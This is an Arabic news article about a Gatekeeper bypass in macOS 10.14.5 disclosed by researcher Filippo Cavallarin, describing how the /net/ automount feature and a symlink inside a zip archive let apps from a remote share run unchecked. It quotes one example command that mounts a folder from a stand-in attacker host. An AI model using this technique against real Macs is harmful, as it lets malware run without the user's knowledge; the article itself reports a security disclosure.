أمايا تومان نشر الباحث الأمني Filippo Cavallarin تحذيرًا بشأن الخطأ في نظام التشغيل macOS 10.14.5 على مدونته. ويتكون هذا من إمكانية تجاوز الإجراءات الأمنية لبرنامج Gatekeeper بشكل كامل. وبحسب كافالارين، فقد أشار إلى الخطأ لشركة آبل بالفعل في فبراير من هذا العام، لكن الشركة لم تقم بإصلاحه في التحديث الأخير.
تم تطوير Gatekeeper بواسطة شركة Apple وتم دمجها في نظام تشغيل سطح المكتب الخاص بها لأول مرة في عام 2012. وهي آلية تمنع تشغيل التطبيق دون علم المستخدم وموافقته. بعد تنزيل أحد التطبيقات، يقوم برنامج Gatekeeper تلقائيًا بفحص الكود الخاص به لمعرفة ما إذا كان البرنامج موقعًا بشكل صحيح بواسطة Apple.
يمكن ان تكون اثار اهتمامك
في منشور مدونته، ذكر كافالارين أن برنامج Gatekeeper، افتراضيًا، يعتبر كلاً من وحدات التخزين الخارجية ومشاركات الشبكة مواقع آمنة. وبالتالي يمكن تشغيل أي تطبيق موجود في هذه الأهداف تلقائيًا دون الحاجة إلى المرور عبر فحص Gatekeeper. وهذه الميزة هي التي يمكن استغلالها لإطلاق برامج ضارة دون علم المستخدم.
أحد الجوانب التي تسمح بالوصول غير المصرح به هو ميزة التحميل التلقائي، والتي تتيح للمستخدمين تحميل مشاركة الشبكة تلقائيًا ببساطة عن طريق تحديد مسار يبدأ بـ "/net/". على سبيل المثال، يستشهد كافالارين بالمسار "ls /net/evil-attacker.com/sharedfolder/" الذي يمكن أن يتسبب في قيام نظام التشغيل بتحميل محتويات مجلد "sharefolder" في موقع بعيد يمكن أن يكون ضارًا.
يمكنك مشاهدة طريقة عمل التهديد في الفيديو:
هناك عامل آخر وهو حقيقة أنه إذا تمت مشاركة أرشيف مضغوط يحتوي على رابط رمزي محدد يؤدي إلى وظيفة التحميل التلقائي، فلن يتم فحصه بواسطة Gatekeeper. وبهذه الطريقة، يمكن للضحية تنزيل الأرشيف الضار بسهولة وفك ضغطه، مما يسمح للمهاجم بتشغيل أي برنامج تقريبًا على جهاز Mac دون علم المستخدم. إن Finder، الذي يخفي ملحقات معينة بشكل افتراضي، لديه أيضًا نصيبه من هذه الثغرة الأمنية.
يذكر كافالارين في مدونته أن شركة آبل لفتت الانتباه إلى ثغرة أمنية في نظام التشغيل macOS في 22 فبراير من هذا العام. ولكن في منتصف شهر مايو، توقفت شركة آبل عن التواصل مع كافالارين، لذلك قرر كافالارين إعلان الأمر برمته.
مصدر: FCVL
